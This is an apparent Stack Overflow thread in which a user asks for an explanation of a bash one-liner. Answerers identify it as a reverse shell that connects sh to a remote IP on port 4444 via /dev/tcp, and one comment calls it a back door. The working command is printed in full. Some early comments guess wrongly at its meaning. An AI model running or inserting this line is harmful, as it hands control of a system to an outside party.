-2

Could someone explain the following command for me please?

0<&112-;exec 112<>/dev/tcp/10.81.147.182/4444;sh <&112 >&112 2>&112
Walid Da.
  • 948
  • 1
  • 7
  • 15
  • I'm guessing that means to establish a ssh listener that receives input and outputs it directly to and from the tcp connection. – Neil Feb 08 '16 at 13:25
  • yes, thanks. do you know the exact meaning of 0<&112.. – Walid Da. Feb 08 '16 at 13:45
  • Don't miss the hyphen! `0<&112-`, that closes the file descriptor. – cdarke Feb 08 '16 at 13:50
  • I think the first part zeroes out all input so nothing will be piped into the shell to start. Searching online, I saw that this command seems to be associated with a hack that allows someone to arbitrarily create files without access. – Neil Feb 08 '16 at 13:51
  • @Neil: `man bash` gives: *`[n]<&digit- moves the file descriptor digit to file descriptor n, or the standard input (file descriptor 0) if n is not specified. digit is closed after being duplicated to n.`* – cdarke Feb 08 '16 at 13:56

1 Answers1

1

See What are the uses of the exec command in shell scripts?

Abbreviations:

  • fd - file descriptor, an I/O channel identified by an integer
  • stdin - file descriptor zero, standard input, by default the terminal keyboard
  • stdout - file descriptor 1, standard output, by default the buffered terminal screen
  • stderr - file descriptor 2, standard error, by default the unbuffered terminal screen

Breaking this down:

# Move existing fd 122 to fd 0 (stdin), then close fd 112
0<&112-;      

# Open fd 112 for read/write on IP address and port
exec 112<>/dev/tcp/10.81.147.182/4444;  

# Run a POSIX shell (sh) taking stdin stdout and stderr to/from port 112
sh <&112 >&112 2>&112
Community
  • 1
  • 1
cdarke
  • 42,728
  • 8
  • 80
  • 84
  • So, in other words, run a back door so whoever is on 10.81.147.182 can use (or probably even control) your system. – tripleee Feb 08 '16 at 16:35